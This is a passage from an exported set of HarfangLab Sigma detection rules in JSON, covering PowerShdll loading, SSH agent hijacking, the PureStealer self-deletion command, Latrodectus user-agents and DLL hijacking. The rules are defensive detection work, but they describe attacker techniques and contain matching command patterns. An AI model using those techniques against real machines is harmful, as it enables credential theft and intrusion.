"content": "title: Single Character Binary Executed\nid: 64c30585-b56c-4b85-9210-f2f288bbf74f\ndescription: |\n Detects the execution of a single character executable.\n Adversaries may use short-name for their malicious binaries, such as 'm.exe' for Mimikatz or 'r.exe' for WinRar for defense evasion.\n It is recommended to verify the legitimacy of the binary.\nreferences:\n - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Modern-Asian-APT-groups-TTPs_report_eng.pdf\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/10/02\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessName|re: '^.\\....$'\n Image|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_r:\n - Description|contains: 'R for Windows'\n ProcessName: 'r.exe'\n - ProcessParentDescription|contains: 'R for Windows'\n - ProcessParentName: 'r.exe'\n ProcessName: 'r.tmp'\n - ProcessCommandLine|contains: '--slave -e IRkernel::main()'\n ProcessName: 'r.exe'\n\n exclusion_d5:\n ProcessName: '2.exe'\n ProcessSignature: 'D5 Inc.'\n\n exclusion_nvidia:\n ProcessName: '?.dat'\n ProcessParentImage: '?:\\Program Files\\NVIDIA Corporation\\NvContainer\\nvcontainer.exe'\n\n exclusion_echtherm:\n Image:\n - '?:\\Program Files\\EchTherm\\fscommand\\\\?.EXE'\n - '?:\\Program Files (x86)\\EchTherm\\fscommand\\\\?.EXE'\n\n exclusion_security_update:\n ProcessParentImage: '?:\\Windows\\System32\\wuauclt.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_intunes:\n ProcessGrandparentImage:\n - '?:\\Program Files\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n\n exclusion_hp_connect:\n ProcessParentCommandLine:\n - '?:\\windows\\temp\\h.exe /log=* /destdir=?:\\Program Files\\HPConnect\\hp-cmsl-wl'\n - '?:\\windows\\temp\\h.exe /log=* /destdir=?:\\Program Files (x86)\\HPConnect\\hp-cmsl-wl'\n\n exclusion_unity:\n ProcessParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\appdata\\local\\temp\\is-rar*.tmp\\x.exe *\\data.unity3d *\\data.unity3d_*'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "64c30585-b56c-4b85-9210-f2f288bbf74f",
"rule_name": "Single Character Binary Executed",
"rule_description": "Detects the execution of a single character executable.\nAdversaries may use short-name for their malicious binaries, such as 'm.exe' for Mimikatz or 'r.exe' for WinRar for defense evasion.\nIt is recommended to verify the legitimacy of the binary.\n",
"rule_creation_date": "2024-10-02",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "64dc131a-601c-401c-a7e3-9e1968f77040",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609412Z",
"creation_date": "2026-03-23T11:45:34.609416Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609423Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/p3nt4/PowerShdll",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1059_001_powershdll_dll_loaded.yml",
"content": "title: Powershdll DLL Loaded\nid: 64dc131a-601c-401c-a7e3-9e1968f77040\ndescription: |\n Detects the loading of the Powershdll, allowing PowerShell script defense evasion.\n Attackers can use this tool to execute PowerShell scripts without spawning the PowerShell executable, allowing them to evade defensive measures.\n It is recommended to investigate the process loading the DLL to look for malicious content or actions.\nreferences:\n - https://github.com/p3nt4/PowerShdll\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/10/11\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.Powershdll\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n - ImageLoaded|endswith: '\\PowerShdll.dll'\n - OriginalFileName: 'PowerShdll.dll'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "64dc131a-601c-401c-a7e3-9e1968f77040",
"rule_name": "Powershdll DLL Loaded",
"rule_description": "Detects the loading of the Powershdll, allowing PowerShell script defense evasion.\nAttackers can use this tool to execute PowerShell scripts without spawning the PowerShell executable, allowing them to evade defensive measures.\nIt is recommended to investigate the process loading the DLL to look for malicious content or actions.\n",
"rule_creation_date": "2022-10-11",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "64f5ab15-4127-4a91-b2bc-5109aad8b014",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619524Z",
"creation_date": "2026-03-23T11:45:34.619526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619530Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md",
"https://attack.mitre.org/techniques/T1027/001/"
],
"name": "t1027_001_truncate_usage_macos.yml",
"content": "title: Truncate Usage\nid: 64f5ab15-4127-4a91-b2bc-5109aad8b014\ndescription: |\n Detects the usage of the truncate utility to perform binary padding or destruction.\n This could be used by an attacker to add junk data and change the on-disk representation of a malware or destroy data.\n It is recommended to investigate this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md\n - https://attack.mitre.org/techniques/T1027/001/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.001\n - attack.t1070.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Truncate\n - classification.macOS.Behavior.Deletion\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/truncate'\n CommandLine|contains: ' -s'\n\n exclusion_podman:\n CommandLine|endswith:\n - '/truncate -s 0 /Users/*/Library/Logs/Podman Desktop/launchd-stderr.log'\n - '/truncate -s 0 /Users/*/Library/Logs/Podman Desktop/launchd-stdout.log'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "64f5ab15-4127-4a91-b2bc-5109aad8b014",
"rule_name": "Truncate Usage",
"rule_description": "Detects the usage of the truncate utility to perform binary padding or destruction.\nThis could be used by an attacker to add junk data and change the on-disk representation of a malware or destroy data.\nIt is recommended to investigate this action to determine its legitimacy.\n",
"rule_creation_date": "2022-11-21",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027.001",
"attack.t1070.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "64f64306-2713-43ab-a8e0-17fe9a81cca9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605083Z",
"creation_date": "2026-03-23T11:45:34.605086Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605093Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.kali.org",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_workstation_name_kali.yml",
"content": "title: Activity linked to Workstation Named Kali\nid: 64f64306-2713-43ab-a8e0-17fe9a81cca9\ndescription: |\n Detects an activity from a machine whose name is Kali, a widely used penetration testing Linux distribution.\n Attackers may connect external machines to the network to conduct malicious activities.\n It is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\nreferences:\n - https://www.kali.org\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/06/04\nmodified: 2025/06/04\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Kali\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n - Workstation: 'KALI'\n - WorkstationName: 'KALI'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "64f64306-2713-43ab-a8e0-17fe9a81cca9",
"rule_name": "Activity linked to Workstation Named Kali",
"rule_description": "Detects an activity from a machine whose name is Kali, a widely used penetration testing Linux distribution.\nAttackers may connect external machines to the network to conduct malicious activities.\nIt is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\n",
"rule_creation_date": "2025-06-04",
"rule_modified_date": "2025-06-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65122d48-ae12-409c-ad44-7bc0372b68f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610737Z",
"creation_date": "2026-03-23T11:45:34.610741Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610748Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.cyble.com/2022/12/27/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/",
"https://attack.mitre.org/techniques/T1587/001/",
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1087/",
"https://attack.mitre.org/techniques/T1095/"
],
"name": "t1587_001_purestealer_usage.yml",
"content": "title: Self-Deletion PowerShell Command linked to PureStealer\nid: 65122d48-ae12-409c-ad44-7bc0372b68f3\ndescription: |\n Detects a suspicious PowerShell command-line associated with the PureStealer malware self-deletion mechanism.\n PureStealer is a malware designed to steal credentials from victims' devices including banking information, crypto wallets and browser credentials.\n It is cheaply provided in darkweb forums and has been widely used in spam campaigns across Europe.\n Look for batch executions and downloaded documents preceding this alert to find the original infection vector.\n It is recommended to investigate compromised materials and credentials as well as to reset accounts of any compromised users.\nreferences:\n - https://blog.cyble.com/2022/12/27/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/\n - https://attack.mitre.org/techniques/T1587/001/\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1087/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2023/01/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1587.001\n - attack.t1539\n - attack.t1087\n - attack.t1095\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Stealer.PureStealer\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ProcessGrandparentCommandLine|contains:\n - 'cmd.exe /c *.bat'\n - 'cmd.exe /c *.exe'\n ProcessParentImage|endswith: '\\\\Local\\\\Temp\\\\*.exe'\n PowershellCommand|contains: 'Start-Sleep -s *; Remove-Item -Path \"*\\\\Local\\\\Temp\\\\*.exe\" -Force'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65122d48-ae12-409c-ad44-7bc0372b68f3",
"rule_name": "Self-Deletion PowerShell Command linked to PureStealer",
"rule_description": "Detects a suspicious PowerShell command-line associated with the PureStealer malware self-deletion mechanism.\nPureStealer is a malware designed to steal credentials from victims' devices including banking information, crypto wallets and browser credentials.\nIt is cheaply provided in darkweb forums and has been widely used in spam campaigns across Europe.\nLook for batch executions and downloaded documents preceding this alert to find the original infection vector.\nIt is recommended to investigate compromised materials and credentials as well as to reset accounts of any compromised users.\n",
"rule_creation_date": "2023-01-02",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1087",
"attack.t1095",
"attack.t1539",
"attack.t1587.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6519f41d-2b23-494d-b1c5-dee52a5166d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080067Z",
"creation_date": "2026-03-23T11:45:34.080069Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080074Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winnt32",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_winnt32.yml",
"content": "title: Suspicious Winnt32.exe Execution\nid: 6519f41d-2b23-494d-b1c5-dee52a5166d5\ndescription: |\n Detects a suspicious execution of Winnt32.exe, possibly to proxy the execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to execute commands.\n Winnt32 is an administrative tool only found on Windows Server 2003, Windows NT, Windows 2000 or XP workstations.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to investigate the legitimacy of the process responsible for the execution of Winnt32.exe, investigate its command-line arguments and to analyze child processes.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winnt32\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName: 'Winnt32.exe'\n - Image|endswith: '\\Winnt32.exe'\n\n selection_commandline:\n CommandLine|contains: '/cmd'\n\n condition: selection and selection_commandline\nlevel: medium\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6519f41d-2b23-494d-b1c5-dee52a5166d5",
"rule_name": "Suspicious Winnt32.exe Execution",
"rule_description": "Detects a suspicious execution of Winnt32.exe, possibly to proxy the execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to execute commands.\nWinnt32 is an administrative tool only found on Windows Server 2003, Windows NT, Windows 2000 or XP workstations.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of Winnt32.exe, investigate its command-line arguments and to analyze child processes.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "654df237-1938-4361-b96b-0ddec4e682c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617529Z",
"creation_date": "2026-03-23T11:45:34.617530Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617535Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://embracethered.com/blog/posts/2022/ttp-diaries-ssh-agent-hijacking/",
"https://attack.mitre.org/techniques/T1563/001/"
],
"name": "t1563_001_ssh_session_hijacking_macos.yml",
"content": "title: SSH Session Hijacking (macOS)\nid: 654df237-1938-4361-b96b-0ddec4e682c1\ndescription: |\n Detects the execution of the ssh binary with the SSH_AUTH_SOCKET variable being set to an ssh-agent UNIX socket in the command-line.\n Attackers may use this to query SSH Agent sockets of other users or services and leverage private keys for which they did not have access.\n It is recommended to investigate any traces of compromise in the machine where this SSH connection began, and to closely monitor the target machine to determine if the connection is malicious.\nreferences:\n - https://embracethered.com/blog/posts/2022/ttp-diaries-ssh-agent-hijacking/\n - https://attack.mitre.org/techniques/T1563/001/\ndate: 2024/03/04\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Lateralization\n - classification.macOS.Behavior.Hijacking\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n CommandLine|contains:\n - 'SSH_AUTH_SOCK=/tmp/ssh-????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-?????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-??????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-???????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-?????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-??????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-???????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-????????????/agent'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "654df237-1938-4361-b96b-0ddec4e682c1",
"rule_name": "SSH Session Hijacking (macOS)",
"rule_description": "Detects the execution of the ssh binary with the SSH_AUTH_SOCKET variable being set to an ssh-agent UNIX socket in the command-line.\nAttackers may use this to query SSH Agent sockets of other users or services and leverage private keys for which they did not have access.\nIt is recommended to investigate any traces of compromise in the machine where this SSH connection began, and to closely monitor the target machine to determine if the connection is malicious.\n",
"rule_creation_date": "2024-03-04",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "655d3bee-dba6-4ac6-b36a-87197f63b083",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603678Z",
"creation_date": "2026-03-23T11:45:34.603682Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603689Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitsight.com/blog/latrodectus-are-you-coming-back",
"https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus",
"https://attack.mitre.org/software/S1160/"
],
"name": "t1071_001_latrodectus_url_request.yml",
"content": "title: URL Request Related to Latrodectus\nid: 655d3bee-dba6-4ac6-b36a-87197f63b083\ndescription: |\n Detects URL requests with a specific User-Agent associated with the Latrodectus malware.\n Latrodectus is a sophisticated malware loader serving as a successor to IcedID with capabilities including payload delivery, reconnaissance, and evasion techniques.\n Is is recommended to investigate the request performed by the process to determine its legitimacy as well as the context around this alert to look for malicious actions.\nreferences:\n - https://www.bitsight.com/blog/latrodectus-are-you-coming-back\n - https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\n - https://attack.mitre.org/software/S1160/\ndate: 2025/08/13\nmodified: 2025/09/18\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1132.001\n - attack.t1573.001\n - attack.exfiltration\n - attack.t1041\n - attack.s1160\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Trojan.Latrodectus\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n UserAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "655d3bee-dba6-4ac6-b36a-87197f63b083",
"rule_name": "URL Request Related to Latrodectus",
"rule_description": "Detects URL requests with a specific User-Agent associated with the Latrodectus malware.\nLatrodectus is a sophisticated malware loader serving as a successor to IcedID with capabilities including payload delivery, reconnaissance, and evasion techniques.\nIs is recommended to investigate the request performed by the process to determine its legitimacy as well as the context around this alert to look for malicious actions.\n",
"rule_creation_date": "2025-08-13",
"rule_modified_date": "2025-09-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1071.001",
"attack.t1132.001",
"attack.t1573.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6575df79-0fcb-4da3-b753-94ba6fb5b878",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087778Z",
"creation_date": "2026-03-23T11:45:34.087780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087784Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_upgraderesultsui.yml",
"content": "title: DLL Hijacking via upgraderesultsui.exe\nid: 6575df79-0fcb-4da3-b753-94ba6fb5b878\ndescription: |\n Detects potential Windows DLL Hijacking via upgraderesultsui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'upgraderesultsui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DMCmnUtils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
